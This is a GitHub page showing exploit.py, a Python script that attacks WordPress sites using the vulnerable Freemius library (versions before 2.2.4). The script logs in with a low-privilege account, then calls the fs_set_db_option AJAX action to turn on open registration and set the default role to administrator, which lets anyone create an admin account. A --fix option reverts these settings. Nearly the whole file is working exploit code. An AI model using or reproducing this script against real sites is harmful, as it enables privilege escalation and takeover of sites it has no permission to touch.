-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathexploit.py
More file actions
192 lines (154 loc) · 7.51 KB
/
exploit.py
File metadata and controls
192 lines (154 loc) · 7.51 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
import argparse
import requests
from getpass import getpass
from bs4 import BeautifulSoup
import os
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def check_plugin_version(url,username,password):
with open("plugins.txt", "r") as file:
lines = file.readlines()
for line in lines:
plugin, version = line.strip().split(",")
plugin_url = f"{url}/wp-content/plugins/{plugin}/readme.txt"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
}
try:
response = requests.get(plugin_url, headers=headers)
if response.status_code == 200:
readme_content = response.text
stable_tag_index = readme_content.find("Stable tag:")
if stable_tag_index != -1:
start_index = stable_tag_index + len("Stable tag:")
end_index = readme_content.find("\n", start_index)
readme_version = readme_content[start_index:end_index].strip()
if readme_version < version:
print("Info: Using plugin "+plugin+" running version "+readme_version+"")
vulncheck(url,args.username,args.password)
exit()
else:
print(f"Plugin: {plugin} Version: {version} Not vulnerable.")
else:
print(f"Plugin: {plugin} Version: {version} No version information found.")
elif response.status_code == 404:
print(f"Plugin: {plugin} Version: {version} Not found.")
else:
print(f"Plugin: {plugin} Version: {version} Request failed with status code {response.status_code}.")
except requests.exceptions.RequestException as e:
print(f"Plugin: {plugin} Version: {version} Request failed with an error: {e}")
def undoadmin(url, username, password):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
# Login to WordPress
login_url = f"{url}/wp-login.php"
session = requests.Session()
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
}
try:
login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
login_response.raise_for_status()
# Extract the required cookies from the response headers
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
else:
print("Failed to log in.")
exit()
# Visit admin-ajax.php to set options
ajax_urls = [
f"{url}/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=0",
f"{url}/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=subscriber",
]
for ajax_url in ajax_urls:
ajax_response = session.get(ajax_url, headers={"User-Agent": user_agent})
ajax_response.raise_for_status()
# Check if option set successfully
if '"success":true' in ajax_response.text:
print(f"Option set successfully: {ajax_url}")
else:
print(f"Failed to set option: {ajax_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent})
if "registration" in register_response.url:
print("Error: it looks like you can still register.")
else:
print("Fixed: You can not longer register")
except requests.exceptions.RequestException as e:
print(f"Request failed with an error: {e}")
def vulncheck(url, username, password):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
# Login to WordPress
login_url = f"{url}/wp-login.php"
session = requests.Session()
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
}
try:
login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
login_response.raise_for_status()
# Extract the required cookies from the response headers
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
else:
print("Failed to log in.")
exit()
# Visit admin-ajax.php to set options
ajax_urls = [
f"{url}/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1",
f"{url}/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator",
]
for ajax_url in ajax_urls:
ajax_response = session.get(ajax_url, headers={"User-Agent": user_agent})
ajax_response.raise_for_status()
# Check if option set successfully
if '"success":true' in ajax_response.text:
print(f"Option set successfully: {ajax_url}")
else:
print(f"Failed to set option: {ajax_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent})
if "Registration confirmation will be emailed to you" in register_response.text:
print("You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.")
exit()
else:
print("boooo")
except requests.exceptions.RequestException as e:
print(f"Request failed with an error: {e}")
# Add the vulnerability description as a comment
DESCRIPTION = """
Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update
Description:
The library, used in numerous plugins, does not have proper authorization when updating blog options,
allowing any authenticated users, such as a subscriber, to update arbitrary options.
"""
# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
parser.add_argument("-f", "--fix", help="Reset after Exploit")
args = parser.parse_args()
# Prompt for password if not provided as an argument
if not args.password:
args.password = getpass("Enter the WordPress password: ")
# Usage
if args.fix:
undoadmin(args.url, args.username,args.password)
else:
check_plugin_version(args.url, args.username,args.password)
vulncheck(args.url, args.username, args.password)